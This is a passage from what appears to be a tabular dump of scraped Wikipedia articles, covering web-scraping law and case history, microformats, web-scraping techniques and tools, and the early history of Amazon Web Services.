shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
456 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Microformat | Microformats ( F) note 1 are a set of defined HTML classes created to serve as consistent and descriptive metadata about an element, designating it as representing a certain type of data (such as contact information, geographic coordinates, events, blog posts, products, recipes, etc.). 1 They allow software to process the information reliably by having set classes refer to a specific type of data rather than being arbitrary. Microformats emerged around 2005 and were predominantly designed for use by search engines, web syndication and aggregators such as RSS. 2 Google confirmed in 2020 that it still parses microformats for use in content indexing. 3 Microformats are referenced in several W3C social web specifications, including IndieAuth 4 and Webmention. 5 Although the content of web pages has been capable of some "automated processing" since the inception of the web, such processing is difficult because the markup elements used to display information on the web do not describe what the information means. 6 Microformats can bridge this gap by attaching semantics, and thereby obviating other, more complicated, methods of automated processing, such as natural language processing or screen scraping. The use, adoption and processing of microformats enables data items to be indexed, searched for, saved or cross-referenced, so that information can be reused or combined. 6 As of 2013 update , microformats allow the encoding and extraction of event details, contact information, social relationships and similar information. Microformats2, abbreviated as mf2, is the updated version of microformats. Mf2 provides a more easy way of interpreting HTML structured syntax and vocabularies than the earlier ways that made use of RDFa and microdata. 7 Microformats emerged around 2005 note 2 as part of a grassroots movement to make recognizable data items (such as events, contact details or geographical locations) capable of automated processing by software, as well as directly readable by end-users. 6 note 3 Link-based microformats emerged first. These include vote links that express opinions of the linked page, which search engines can tally into instant polls. 8 CommerceNet, a nonprofit organization that promotes e-commerce on the Internet, has helped sponsor and promote the technology and support the microformats community in various ways. 8 CommerceNet also helped co-found the Microformats.org community site. 8 Neither CommerceNet nor Microformats.org operates as a standards body. The microformats community functions through an open wiki, a mailing list, and an Internet relay chat (IRC) channel. 8 Most of the existing microformats originated at the Microformats.org wiki and the associated mailing list citation needed by a process of gathering examples of web-publishing behaviour, then codifying it. Some other microformats (such as rel nofollow and unAPI) have been proposed, or developed, elsewhere. XHTML and HTML standards allow for the embedding and encoding of semantics within the attributes of markup elements. Microformats take advantage of these standards by indicating the presence of metadata using the following attributes: For example, in the text "The birds roosted at 52.48, 1.89" is a pair of numbers which may be understood, from their context, to be a set of geographic coordinates. With wrapping in spans (or other HTML elements) with specific class names (in this case geo, latitude and longitude, all part of the geo microformat specification): software agents can recognize exactly what each value represents and can then perform a variety of tasks such as indexing, locating it on a map and exporting it to a GPS device. In this example, the contact information is presented as follows: With hCard microformat markup, that becomes: Here, the formatted name (fn), organisation (org), telephone number (tel) and web address (url) have been identified using specific class names and the whole thing is wrapped in class "vcard", which indicates that the other classes form an hCard (short for "HTML vCard") and are not merely coincidentally named. Other, optional, hCard classes also exist. Software, such as browser plug-ins, can now extract the information, and transfer it to other applications, such as an address book. For annotated examples of microformats on live pages, see HCard Live example and Geo (microformat) Usage. Several microformats have been developed to enable semantic markup of particular types of information. However, only hCard and hCalendar have been ratified, the others remaining as drafts: Using microformats within HTML code provides additional formatting and semantic data that applications can use. For example, applications such as web crawlers can collect data about online resources, or desktop applications such as e-mail clients or scheduling software can compile details. The use of microformats can also facilitate "mash ups" such as exporting all of the geographical locations on a web page into (for example) Google Maps to visualize them spatially. Several browser extensions, such as Operator for Firefox and Oomph for Internet Explorer, provide the ability to detect microformats within an HTML document. When hCard or hCalendar are involved, such browser extensions allow microformats to be exported into formats compatible with contact management and calendar utilities, such as Microsoft Outlook. When dealing with geographical coordinates, they allow the location to be sent to applications such as Google Maps. Yahoo Query Language can be used to extract microformats from web pages. 16 On 12 May 2009 Google announced that they would be parsing the hCard, hReview and hProduct microformats, and using them to populate search result pages. 17 They subsequently extended this in 2010 to use hCalendar for events and hRecipe for cookery recipes. 18 Similarly, microformats are also processed by Bing 19 and Yahoo . 20 As of late 2010, these are the world's top three search engines. 21 Microsoft said in 2006 that they needed to incorporate microformats into upcoming projects, 22 as did other software companies. Alex Faaborg summarizes the arguments for putting the responsibility for microformat user interfaces in the web browser rather than making more complicated HTML: 23 Various commentators have offered review and discussion on the design principles and practical aspects of microformats. Microformats have been compared to other approaches that seek to serve the same or similar purpose. 24 As of 2007 update , there had been some criticism of one, or all, microformats. 24 The spread and use of microformats was being advocated as of 2007 update . 25 26 Opera Software CTO and CSS creator H kon Wium Lie said in 2005 "We will also see a bunch of microformats being developed, and that’s how the semantic web will be built, I believe. 27 However, in August 2008 Toby Inkster, author of the "Swignition" (formerly "Cognition") microformat parsing service, pointed out that no new microformat specifications had been published since 2005. 28 Computer scientist and entrepreneur, Rohit Khare stated that reduce, reuse, and recycle is "shorthand for several design principles" that motivated the development and practices behind microformats. 8 : 71 72 These aspects can be summarized as follows: Because some microformats make use of title attribute of HTML's abbr element to conceal machine-readable data (particularly date-times and geographical coordinates) in the "abbr design pattern", the plain text content of the element is inaccessible to screen readers that expand abbreviations. 29 In June 2008 the BBC announced that it would be dropping use of microformats using the abbr design pattern because of accessibility concerns. 30 Microformats are not the only solution for providing "more intelligent data" on the web; alternative approaches are used and are under development. For example, the use of XML markup and standards of the Semantic Web are cited as alternative approaches. 8 Some contrast these with microformats in that they do not necessarily coincide with the design principles of "reduce, reuse, and recycle", at least not to the same extent. 8 One advocate of microformats, Tantek elik, characterized a problem with alternative approaches: Here's a new language we want you to learn, and now you need to output these additional files on your server. It's a hassle. (Microformats) lower the barrier to entry. 6 For some applications the use of other approaches may be valid. If the type of data to be described does not map to an existing microformat, RDFa can embed arbitrary vocabularies into HTML, such as for example domain-specific scientific data such as zoological or chemical data for which there is no microformat. Standards such as W3C's GRDDL allow microformats to be converted into data compatible with the Semantic Web. 31 Another advocate of microformats, Ryan King, put the compatibility of microformats with other approaches this way: Microformats provide an easy way for many people to contribute semantic data to the web. With GRDDL all of that data is made available for RDF Semantic Web tools. Microformats and GRDDL can work together to build a better web. 31 Microformats2 was proposed and discussed during FOOEast, 2010 05 02. 32 Microformats2 was intended to make it easier for authors to publish microformats and for developers to consume them, while remaining backwards compatible 33 Using microformats2, the example above would be marked up as: and: |
457 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-23 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
458 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Amazon_AWS | Amazon Web Services, Inc. (AWS) is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling (a process that allows a client to use more computing in times of high application usage, and then scale down to reduce costs when there is less traffic). These cloud computing web services provide various services related to networking, compute, storage, middleware, IoT and other processing capacity, as well as software tools via AWS server farms. This frees clients from managing, scaling, and patching hardware and operating systems. One of the foundational services is Amazon Elastic Compute Cloud (EC2), which allows users to have at their disposal a virtual cluster of computers, with extremely high availability, which can be interacted with over the internet via REST APIs, a CLI or the AWS console. AWS's virtual computers emulate most of the attributes of a real computer, including hardware central processing units (CPUs) and graphics processing units (GPUs) for processing; local RAM memory; Hard-disk(HDD) SSD storage; a choice of operating systems; networking; and pre-loaded application software such as web servers, databases, and customer relationship management (CRM). AWS services are delivered to customers via a network of AWS server farms located throughout the world. Fees are based on a combination of usage (known as a "Pay-as-you-go" model), hardware, operating system, software, and networking features chosen by the subscriber requiring various degrees of availability, redundancy, security, and service options. Subscribers can pay for a single virtual AWS computer, a dedicated physical computer, or clusters of either. 7 Amazon provides select portions of security for subscribers (e.g. physical security of the data centers) while other aspects of security are the responsibility of the subscriber (e.g. account management, vulnerability scanning, patching). AWS operates from many global geographical regions including seven in North America. 8 Amazon markets AWS to subscribers as a way of obtaining large-scale computing capacity more quickly and cheaply than building an actual physical server farm. 9 All services are billed based on usage, but each service measures usage in varying ways. As of 2023 Q1, AWS has 31% market share for cloud infrastructure while the next two competitors Microsoft Azure and Google Cloud have 25%, and 11% respectively, according to Synergy Research Group. 10 11 As of 2021, update AWS comprises over 200 12 products and services including computing, storage, networking, database, analytics, application services, deployment, management, machine learning, 13 mobile, developer tools, RobOps and tools for the Internet of Things. The most popular include Amazon Elastic Compute Cloud (EC2), Amazon Simple Storage Service (Amazon S3), Amazon Connect, and AWS Lambda (a serverless function that can perform arbitrary code written in any language that can be configured to be triggered by hundreds of events, including HTTP calls). 14 Services expose functionality through APIs for clients to use in their applications. These APIs are accessed over HTTP, using the REST architectural style and SOAP protocol for older APIs and exclusively JSON for newer ones. Clients can interact with these APIs in various ways, including from the AWS console (a website), by using SDKs written in various languages (such as Python, Java, and JavaScript), or by making direct REST calls. The genesis of AWS came in the early 2000s. After building Merchant.com, Amazon's e-commerce-as-a-service platform that offers third-party retailers a way to build their own web-stores, Amazon pursued service-oriented architecture as a means to scale its engineering operations, 15 16 17 18 19 20 21 led by then CTO Allan Vermeulen. 22 Around the same time frame, Amazon was frustrated with the speed of its software engineering, and sought to implement various recommendations put forth by Matt Round, an engineering leader at the time, including maximization of autonomy for engineering teams, adoption of REST, standardization of infrastructure, removal of gate-keeping decision-makers (bureaucracy), and continuous deployment. He also called for increasing the percentage of the time engineers spent building the software rather than doing other tasks. 23 Amazon created "a shared IT platform" so its engineering organizations, which were spending 70% of their time on "undifferentiated heavy-lifting" such as IT and infrastructure problems, could focus on customer-facing innovation instead. 24 25 Besides, in dealing with unusual peak traffic patterns, especially during the holiday season, by migrating services to commodity Linux hardware and relying on open source software, Amazon's Infrastructure team, led by Tom Killalea, 26 Amazon's first CISO, 27 had already run its data centers and associated services in a "fast, reliable, cheap" way. 26 In July 2002 Amazon.com Web Services, managed by Colin Bryar, 28 launched its first web services, opening up the Amazon.com platform to all developers. 29 Over one hundred applications were built on top of it by 2004. 30 This unexpected developer interest took Amazon by surprise and convinced them that developers were "hungry for more". 25 By the summer of 2003, Andy Jassy had taken over Bryar's portfolio 31 at Rick Dalzell's behest, after Vermeulen, who was Bezos' first pick, declined the offer. 22 Jassy subsequently mapped out the vision for an "Internet OS" 15 17 19 32 made up of foundational infrastructure primitives that alleviated key impediments to shipping software applications faster. 15 16 17 19 21 By fall 2003, 15 17 databases, storage, and compute were identified as the first set of infrastructure pieces that Amazon should launch. 15 17 25 Jeff Barr, an early AWS employee, credits Vermeulen, Jassy, Bezos himself, and a few others for coming up with the idea that would evolve into EC2, S3, and RDS; 33 Jassy recalls the idea was the result of brainstorming for about a week with "ten of the best technology minds and ten of the best product management minds" on about ten different internet applications and the most primitive building blocks required to build them. 19 Werner Vogels cites Amazon's desire to make the process of "invent, launch, reinvent, relaunch, start over, rinse, repeat" as fast as it could was leading them to break down organizational structures with "two-pizza teams" c and application structures with distributed systems; d and that these changes ultimately paved way for the formation of AWS 21 and its mission "to expose all of the atomic-level pieces of the Amazon.com platform". 36 According to Brewster Kahle, co-founder of Alexa Internet, which was acquired by Amazon in 1999, his start-up's compute infrastructure helped Amazon solve its big data problems and later informed the innovations that underpinned AWS. 37 Jassy assembled a founding team of 57 employees from a mix of engineering and business backgrounds to kick-start these initiatives, 19 18 with a majority of the hires coming from outside the company; 19 Jeff Lawson, Twilio CEO, 38 Adam Selipsky, Tableau CEO, 39 40 and Mikhail Seregine, 41 co-founder at Outschool among them. In late 2003, the concept for compute, e which would later launch as EC2, was reformulated when Chris Pinkham and Benjamin Black presented a paper internally describing a vision for Amazon's retail computing infrastructure that was completely standardized, completely automated, and would rely extensively on web services for services such as storage and would draw on internal work already underway. Near the end of their paper, they mentioned the possibility of selling access to virtual servers as a service, proposing the company could generate revenue from the new infrastructure investment. 43 unreliable source? Thereafter Pinkham, Willem van Biljon, and lead developer Christopher Brown developed the Amazon EC2 service, with a team in Cape Town, South Africa. 44 In November 2004, AWS launched its first infrastructure service for public usage: Simple Queue Service (SQS). 45 On March 14, 2006, AWS launched Amazon S3 cloud storage 46 followed by EC2 in August 2006. 47 48 Andy Jassy, AWS founder and vice president in 2006, said at the time that Amazon S3 "helps free developers from worrying about where they are going to store data, whether it will be safe and secure, if it will be available when they need it, the costs associated with server maintenance, or whether they have enough storage available. Amazon S3 enables developers to focus on innovating with data, rather than figuring out how to store it. 1 Pi Corporation, a startup Paul Maritz co-founded, was the first beta-user of EC2 outside of Amazon, 19 while Microsoft was among EC2's first enterprise customers. 49 Later that year, SmugMug, one of the early AWS adopters, attributed savings of around US$400,000 in storage costs to S3. 50 According to Vogels, S3 was built with 8 microservices when it launched in 2006, but had over 300 microservices by 2022. 51 In September 2007, AWS announced its annual Start-up Challenge, a contest with prizes worth $100,000 for entrepreneurs and software developers based in the US using AWS services such as S3 and EC2 to build their businesses. 52 The first edition saw participation from Justin.tv, 53 which Amazon would later acquire in 2014. 54 Ooyala, an online media company, 55 was the eventual winner. 53 Additional AWS services from this period include SimpleDB, Mechanical Turk, Elastic Block Store, Elastic Beanstalk, Relational Database Service, DynamoDB, CloudWatch, Simple Workflow, CloudFront, and Availability Zones. In November 2010, it was reported that all of Amazon.com's retail sites had migrated to AWS. 56 Prior to 2012, AWS was considered a part of Amazon.com and so its revenue was not delineated in Amazon financial statements. In that year industry watchers for the first time estimated AWS revenue to be over $1.5 billion. 57 On November 27, 2012, AWS hosted its first major annual conference, re:Invent with a focus on AWS's partners and ecosystem, 58 with over 150 sessions. 59 The three-day event was held in Las Vegas because of its relatively cheaper connectivity with locations across the United States and the rest of the world. 60 Andy Jassy and Werner Vogels presented keynotes, with Jeff Bezos joining Vogels for a fireside chat. 61 AWS opened early registrations at US$1,099 per head for their customers 59 from over 190 countries. 62 On stage with Andy Jassy at the event which saw around 6000 attendees, Reed Hastings, CEO at Netflix, announced plans to migrate 100% of Netflix's infrastructure to AWS. 61 To support industry-wide training and skills standardization, AWS began offering a certification program for computer engineers, on April 30, 2013, to highlight expertise in cloud computing. 63 Later that year, in October, AWS launched Activate, a program for start-ups worldwide to leverage AWS credits, third-party integrations, and free access to AWS experts to help build their business. 64 In 2014, AWS launched its partner network, AWS Partner Network (APN), which is focused on helping AWS-based companies grow and scale the success of their business with close collaboration and best practices. 65 66 In January 2015, Amazon Web Services acquired Annapurna Labs, an Israel-based microelectronics company for a reported US$350 370M. 67 68 In April 2015, Amazon.com reported AWS was profitable, with sales of $1.57 billion in the first quarter of the year and $265 million of operating income. Founder Jeff Bezos described it as a fast-growing $5 billion business; analysts described it as "surprisingly more profitable than forecast". 69 In October, Amazon.com said in its Q3 earnings report that AWS's operating income was $521 million, with operating margins at 25 percent. AWS's 2015 Q3 revenue was $2.1 billion, a 78% increase from 2014's Q3 revenue of $1.17 billion. 70 2015 Q4 revenue for the AWS segment increased 69.5% y y to $2.4 billion with a 28.5% operating margin, giving AWS a $9.6 billion run rate. In 2015, Gartner estimated that AWS customers are deploying 10x more infrastructure on AWS than the combined adoption of the next 14 providers. 71 In 2016 Q1, revenue was $2.57 billion with net income of $604 million, a 64% increase over 2015 Q1 that resulted in AWS being more profitable than 